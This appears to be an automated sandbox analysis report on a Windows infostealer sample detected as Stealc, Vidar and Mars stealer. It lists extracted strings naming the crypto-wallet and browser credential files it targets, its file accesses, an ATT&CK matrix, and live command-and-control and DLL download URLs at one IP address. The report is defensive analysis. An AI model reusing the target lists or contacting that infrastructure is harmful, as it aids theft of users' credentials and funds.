Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\jlO7971vUz.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\jlO7971vUz.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: jlO7971vUz.exe PID: 2380, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jlO7971vUz.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jlO7971vUz.exe.17e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jlO7971vUz.exe PID: 2380, type: MEMORYSTR

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C620C40 sqlite3_bind_zeroblob,	0_2_6C620C40
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C620D60 sqlite3_bind_parameter_name,	0_2_6C620D60
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C548EA0 sqlite3_clear_bindings,	0_2_6C548EA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	111 Process Injection	1 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	143 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
jlO7971vUz.exe	50%	ReversingLabs	Win32.Spyware.Stealc
jlO7971vUz.exe	51%	Virustotal		Browse
jlO7971vUz.exe	100%	Avira	HEUR/AGEN.1319578

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Virustotal	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	3%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://147.45.78.162/a17861b9cb6f1a53.phpX	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://mozilla.org0/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://147.45.78.162/d82daa352ff6e06f/freebl3.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/nss3.dll	100%	Avira URL Cloud	malware
http://147.45.78.162/d82daa352ff6e06f/freebl3.dll1	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://147.45.78.162/d82daa352ff6e06f/nss3.dll	11%	Virustotal		Browse
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/nss3.dll_=	100%	Avira URL Cloud	malware
http://147.45.78.162/d82daa352ff6e06f/freebl3.dll	11%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://147.45.78.162/d82daa352ff6e06f/mozglue.dll	100%	Avira URL Cloud	malware
http://147.45.78.162/d82daa352ff6e06f/vcruntime140.dll	100%	Avira URL Cloud	malware
147.45.78.162/a17861b9cb6f1a53.php	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/sqlite3.dll	100%	Avira URL Cloud	malware
http://147.45.78.162/d82daa352ff6e06f/vcruntime140.dll	11%	Virustotal		Browse
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	Avira URL Cloud	safe
http://147.45.78.162/d82daa352ff6e06f/mozglue.dll	11%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/softokn3.dllw	100%	Avira URL Cloud	malware
http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Avira URL Cloud	safe
147.45.78.162/a17861b9cb6f1a53.php	11%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/sqlite3.dll	11%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/softokn3.dll	100%	Avira URL Cloud	malware
http://147.45.78.162/a17861b9cb6f1a53.php.0//EN	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	Avira URL Cloud	safe
http://147.45.78.162/d82daa352ff6e06f/softokn3.dll	11%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/mozglue.dllW	100%	Avira URL Cloud	malware
http://147.45.78.162/a17861b9cb6f1a53.php	100%	Avira URL Cloud	malware
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	Avira URL Cloud	safe
http://147.45.78.162	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	Virustotal		Browse
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Virustotal		Browse
http://147.45.78.162/a17861b9cb6f1a53.php	11%	Virustotal		Browse
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll#	100%	Avira URL Cloud	malware
http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll	11%	Virustotal		Browse
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Virustotal		Browse
http://147.45.78.162	12%	Virustotal		Browse
http://www.sqlite.org/copyright.html.	0%	Avira URL Cloud	safe
http://www.sqlite.org/copyright.html.	0%	Virustotal		Browse
http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll#	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://147.45.78.162/d82daa352ff6e06f/freebl3.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/d82daa352ff6e06f/nss3.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/d82daa352ff6e06f/mozglue.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/d82daa352ff6e06f/vcruntime140.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
147.45.78.162/a17861b9cb6f1a53.php	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/d82daa352ff6e06f/sqlite3.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/d82daa352ff6e06f/softokn3.dll	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.78.162/a17861b9cb6f1a53.php	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	jlO7971vUz.exe, jlO7971vUz.exe, 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://147.45.78.162/a17861b9cb6f1a53.phpX	jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://147.45.78.162/d82daa352ff6e06f/freebl3.dll1	jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	BKJKEBGDHDAFHJKEGIID.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	false	Avira URL Cloud: safe	unknown
http://147.45.78.162/d82daa352ff6e06f/nss3.dll_=	jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	false	URL Reputation: safe	unknown
http://147.45.78.162/d82daa352ff6e06f/softokn3.dllw	jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
